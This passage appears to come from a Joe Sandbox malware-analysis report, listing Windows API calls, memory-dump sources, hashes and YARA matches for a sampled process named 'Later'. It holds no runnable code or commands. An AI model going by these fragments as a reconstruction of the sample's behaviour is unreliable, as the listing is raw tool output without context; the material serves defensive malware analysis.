                                        • Instruction ID: b56b666c6a2b24c4ae6fd090019e9b1693ae2f9de312e4943ab8d41bf7faf1e6
                                        • Opcode Fuzzy Hash: 54a5f356a932f81bf7309febcedda4b70054330c8d8c4f297625cf12bc4a71b1
                                        • Instruction Fuzzy Hash: D0415872900209EFDF16CF98DD90AEEBBB5BF58314F18819EFA04A7221D335A950DB51
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 014BA35F
                                          • Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionRaise___std_exception_copy
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 3109751735-1866435925
                                        • Opcode ID: 0ec6eaf3f90d4535de47e4a513305708a2b8c602d270ecd0cd4fe7ca9555b27c
                                        • Instruction ID: e3a8538377a8d95b0362a880411a604dd11ec74127a2cf53e03b5a9c4d53053b
                                        • Opcode Fuzzy Hash: 0ec6eaf3f90d4535de47e4a513305708a2b8c602d270ecd0cd4fe7ca9555b27c
                                        • Instruction Fuzzy Hash: 861106B29403156BC714DF69C846BD6B7E8FF25210F24892BE9549B650F772E940CBA0
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C301AA,?), ref: 00C6C4AF
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C4C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        • Opcode ID: 5d45dcf25b49d4dbeb6048b8f4fe6436bd5088128826e354876aa99ea248f8f5
                                        • Instruction ID: 06753787dabeacc03e3290eaef7295c6c2c6cf1ef3e96155da81f7fc27a79ebc
                                        • Opcode Fuzzy Hash: 5d45dcf25b49d4dbeb6048b8f4fe6436bd5088128826e354876aa99ea248f8f5
                                        • Instruction Fuzzy Hash: 65E0C276500B138FEB309B25C898B7A76D4BF14769F508439E8EAC2620EB70E840C710
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C04AF7,?), ref: 00C04BB8
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C04BCA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 2574300362-1355242751
                                        • Opcode ID: f948b882a1511d5d8190b5d9aa541d5317a5308d251e893975611e399b2c16f9
                                        • Instruction ID: ae8b12ad6fcbb5ab876f2d6318702ed462ee020992d6bc7738c3fe2d19770227
                                        • Opcode Fuzzy Hash: f948b882a1511d5d8190b5d9aa541d5317a5308d251e893975611e399b2c16f9
                                        • Instruction Fuzzy Hash: 7BD0C7B0800B128FDB20AF30D808B0B72E4AF00360F208CBAD8A2C2590EA70E980CB00
                                        APIs
                                        • GetConsoleOutputCP.KERNEL32(940E2C7A,00000000,00000000,00000000), ref: 014F63D9
                                          • Part of subcall function 014F188F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,014EFC41,?,00000000,-00000008), ref: 014F18F0
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 014F662B
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 014F6671
                                        • GetLastError.KERNEL32 ref: 014F6714
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                        • String ID:
                                        • API String ID: 2112829910-0
                                        • Opcode ID: 7c1491bb715a813e958375834c115bfebac30f22db6aee0dca4bc766a0315a4e
                                        • Instruction ID: 2684ba960767e6a110b705a9d8993356fcfb32cd74138c279bfd380b1306d2c3
                                        • Opcode Fuzzy Hash: 7c1491bb715a813e958375834c115bfebac30f22db6aee0dca4bc766a0315a4e
                                        • Instruction Fuzzy Hash: 85D17875D002499FDF15CFE8D8809AEBBF5FF09310F29452EE625AB361E630A946CB50
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 00C6E56F
                                        • CharLowerBuffW.USER32(?,?), ref: 00C6E5B2
                                          • Part of subcall function 00C6DC56: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C6DC76
                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C6E7B2
                                        • _memmove.LIBCMT ref: 00C6E7C5
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                        • String ID:
                                        • API String ID: 3659485706-0
                                        • Opcode ID: 5ed5608380583698d499d0b774ce52bb019d8379255bd855f74e54d4aa1db02e
                                        • Instruction ID: f168b53dd42093b93bcc3ad6f28dee2bd68381d8a3cef903162f79c77f0437f0
                                        • Opcode Fuzzy Hash: 5ed5608380583698d499d0b774ce52bb019d8379255bd855f74e54d4aa1db02e
                                        • Instruction Fuzzy Hash: 7DC15A75A083019FC714DF28C48096ABBE4FF89318F14896EF9999B351D771EA46CB82
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00C68575
                                        • CoUninitialize.OLE32 ref: 00C68580
                                          • Part of subcall function 00C7DC66: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00C687D6,?,00000000), ref: 00C7DCCE
                                        • #8.OLEAUT32(?), ref: 00C6858B
                                        • #9.WSOCK32(?), ref: 00C6885C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize
                                        • String ID:
                                        • API String ID: 948891078-0
                                        • Opcode ID: 8fdd80cd06da960297b91ada734ceae6bc9e76cdf4aa7e2364acda796eea3c19
                                        • Instruction ID: a989d85bebb7a0c923b4069ef96819c99eec6fc616d572900a12077086c180d9
                                        • Opcode Fuzzy Hash: 8fdd80cd06da960297b91ada734ceae6bc9e76cdf4aa7e2364acda796eea3c19
                                        • Instruction Fuzzy Hash: 72A15A792047059FC720DF54C485B2AB7E4FF88354F148998FA999B3A2CB30ED49CB92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 0a6e63002584c44fe614a54a54a28f14c731a7505a19a576430adb121db221cf
                                        • Instruction ID: 7cc0d315dd264981a6c0cb0a9ffd83e18550f63cb3746b335324a14f7ad33973
                                        • Opcode Fuzzy Hash: 0a6e63002584c44fe614a54a54a28f14c731a7505a19a576430adb121db221cf
                                        • Instruction Fuzzy Hash: A551B272A05212AFEF258F59D8E0BBA7BA9EF14610F14452FE919472B0D731F842CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                        • String ID:
                                        • API String ID: 2782032738-0
                                        • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                        • Instruction ID: aacc9b064185cffae28bfd688b00964b6846c2de24167c8a77eb3b89017c0d44
                                        • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                        • Instruction Fuzzy Hash: A641E8716047069BEB1CDEA9C8819EF77AAAF87360F24813DE455C7680D770DEC1A740
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b0dfa7902cfa80dfd146d3e4e5b782bda634c9d100742b5229143df31da47cb
                                        • Instruction ID: 666d479a6a822e4ea5351ce080b6eaf8c447128d419da0f08bc2c5be54eeb301
                                        • Opcode Fuzzy Hash: 3b0dfa7902cfa80dfd146d3e4e5b782bda634c9d100742b5229143df31da47cb
                                        • Instruction Fuzzy Hash: C54117B2A00705AFD7259F79C808BABBBE8EB58711F10856FE151EB3A0D671D9408790
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000002,?,00000000,00000000,00000000,940E2C7A,00000000), ref: 0141037E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: d77a39e3d1337fc3e6de68c69b878be95c23a3d4a36e97d4df5b0afe97e44539
                                        • Instruction ID: 834fced72fddeec20f0799a6a02a3554e9a73c95f2116ffe7b3f329689cafcbc
                                        • Opcode Fuzzy Hash: d77a39e3d1337fc3e6de68c69b878be95c23a3d4a36e97d4df5b0afe97e44539
                                        • Instruction Fuzzy Hash: 1A41C531A40209AFEB20CF95CC45FAEBBB5FB48710F14452AF211BB2D0C7B0A944CB64
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C4A46D
                                        • __itow.LIBCMT ref: 00C4A49E
                                          • Part of subcall function 00C4A6EE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C4A759
                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C4A507
                                        • __itow.LIBCMT ref: 00C4A55E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow
                                        • String ID:
                                        • API String ID: 3379773720-0
                                        • Opcode ID: 59c45fc362c4e6cfec870d54a2a72c3e32b89dcb0faccd52a664df65527ea9d2
                                        • Instruction ID: 4fd9cca77081a6e1938701656fec9c554192efbf86ca195c5a3e9a857c6da404
                                        • Opcode Fuzzy Hash: 59c45fc362c4e6cfec870d54a2a72c3e32b89dcb0faccd52a664df65527ea9d2
                                        • Instruction Fuzzy Hash: 7F415B70A40209AFDF11EF64C85ABFEBBB9FF44750F040029F915A7291DB749A44DBA2
                                        APIs
                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C80980), ref: 00C66957
                                        • _strlen.LIBCMT ref: 00C66989
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID:
                                        • API String ID: 4218353326-0
                                        • Opcode ID: 6c239955b5c4dcb47ecab34177d33aec92beb4a389499c85022bb467d9f04074
                                        • Instruction ID: 480818b73210fc032a8c30d7e96f5a0fed89f0c527d6df115d0d59e3f25fe7bc
                                        • Opcode Fuzzy Hash: 6c239955b5c4dcb47ecab34177d33aec92beb4a389499c85022bb467d9f04074
                                        • Instruction Fuzzy Hash: 8041B571A00108AFDB24FBA4DCD2FBEB3A9AF44314F148155F916972D2DB30AE45EB90
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C2635B
                                        • __isleadbyte_l.LIBCMT ref: 00C26389
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C263B7
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C263ED
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: face444f1a19305b27ccc627da0d1d34ef6f0a124a2d7743d476d12265a3e449
                                        • Instruction ID: b4c30c3e61d9dd91023180d2a52918e12c11e5ed9d74e54339f3f25fe2183276
                                        • Opcode Fuzzy Hash: face444f1a19305b27ccc627da0d1d34ef6f0a124a2d7743d476d12265a3e449
                                        • Instruction Fuzzy Hash: 0931B231600266EFDB25DF65E844BAE7BB5FF41320F154028F864875A0D731D991EBA0
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000002,?,00000000,00000000,00000000,940E2C7A,00000000), ref: 0141037E
                                        • MultiByteToWideChar.KERNEL32(00000000,00000002,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,940E2C7A,00000000), ref: 014103B7
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000), ref: 014103E1
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 01410426
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: 8c1d338a6cad6baabc4854fedf35358913cc3f9039dddaf51ccf43d2eade95ba
                                        • Instruction ID: 07f7656711a7f981dde5f5a20800b481f6cedb1a6cbc905ad1d38ea36d140364
                                        • Opcode Fuzzy Hash: 8c1d338a6cad6baabc4854fedf35358913cc3f9039dddaf51ccf43d2eade95ba
                                        • Instruction Fuzzy Hash: 0331A231B40209AFEB24CF94CC45FADBBB6FB48711F24451AE201BB1D0C770A984CB65
                                        APIs
                                          • Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3
                                        • GetCursorPos.USER32(?), ref: 00C7C8F5
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C2BC1C,?,?,?,?,?), ref: 00C7C90A
                                        • GetCursorPos.USER32(?), ref: 00C7C957
                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C2BC1C,?,?,?), ref: 00C7C991
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                        • String ID:
                                        • API String ID: 2864067406-0
                                        • Opcode ID: 9653f36139b8049ec6fda7d82021b98ba4f8487ac5747cc93b364933629739c2
                                        • Instruction ID: f603f3df35904c88f7cca030fb1bef46b4b29fad8547380a9e35e620e77d3744
                                        • Opcode Fuzzy Hash: 9653f36139b8049ec6fda7d82021b98ba4f8487ac5747cc93b364933629739c2
                                        • Instruction Fuzzy Hash: 5C31D035600118AFCB558F64D8A8FFE7BB5EB4A310F048169FA198B261C7319E60DFA0
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 678e4971e3ecf474e1575b1e59ccf276091cefa58a134339213896a5ab90cf2b
                                        • Instruction ID: 69329c4ded442157d692487833285aab04d9a3cafded8ef7df71ce173b22bd3f
                                        • Opcode Fuzzy Hash: 678e4971e3ecf474e1575b1e59ccf276091cefa58a134339213896a5ab90cf2b
                                        • Instruction Fuzzy Hash: 67219571600216AFCB21AF66C8889AF77E9BF7026AF12891BF915D7270D730DC00C7A0
                                        APIs
                                        • __setmode.LIBCMT ref: 00C10B0D
                                          • Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57CBE,?,?,00000000), ref: 00C04041
                                          • Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57CBE,?,?,00000000,?,?), ref: 00C04065
                                        • _fprintf.LIBCMT ref: 00C10B44
                                        • OutputDebugStringW.KERNEL32(?), ref: 00C4672F
                                          • Part of subcall function 00C14BFA: _flsall.LIBCMT ref: 00C14C13
                                        • __setmode.LIBCMT ref: 00C10B79
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                        • String ID:
                                        • API String ID: 521402451-0
                                        • Opcode ID: 7515feb8e9aad4625a327c99d558ac81c80b7ed72b36865b5798aaa8fa825f50
                                        • Instruction ID: e5810c2d8806d03f080d965619796c2713fbafee975961af9a7db7997362da4c
                                        • Opcode Fuzzy Hash: 7515feb8e9aad4625a327c99d558ac81c80b7ed72b36865b5798aaa8fa825f50
                                        • Instruction Fuzzy Hash: 361124729042046BDB08B7A89C42EFE7B699F42324F244165F204A31C2DE605DC6B7A5
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 014F2D67
                                          • Part of subcall function 014F188F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,014EFC41,?,00000000,-00000008), ref: 014F18F0
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 014F2D9F
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 014F2DBF
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 158306478-0
                                        • Opcode ID: 0a77ff61f02a43c6e0c1b3244dfd7407cc0431501568a62fe9a66d1aa8230a87
                                        • Instruction ID: 18cc67a49d3175b5f983193ee361eb5930cb569f8dbbeecc879bc92aa4d194c1
                                        • Opcode Fuzzy Hash: 0a77ff61f02a43c6e0c1b3244dfd7407cc0431501568a62fe9a66d1aa8230a87
                                        • Instruction Fuzzy Hash: F61104B1902517BFA62267F65CCCCBF69ADEEA8095700002EFA05D5350EEB0DD0252B1
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00C76185
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C7619F
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C761AD
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C761BB
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: 39c353e469eef850f1f0392f0d40a08e7ff96cf70b88c63bc676ae179c0cd71e
                                        • Instruction ID: 4cfcdeff61f3141afb6f9cd89e584b73ff5fabd84da1b64091eb8f0bf9576af2
                                        • Opcode Fuzzy Hash: 39c353e469eef850f1f0392f0d40a08e7ff96cf70b88c63bc676ae179c0cd71e
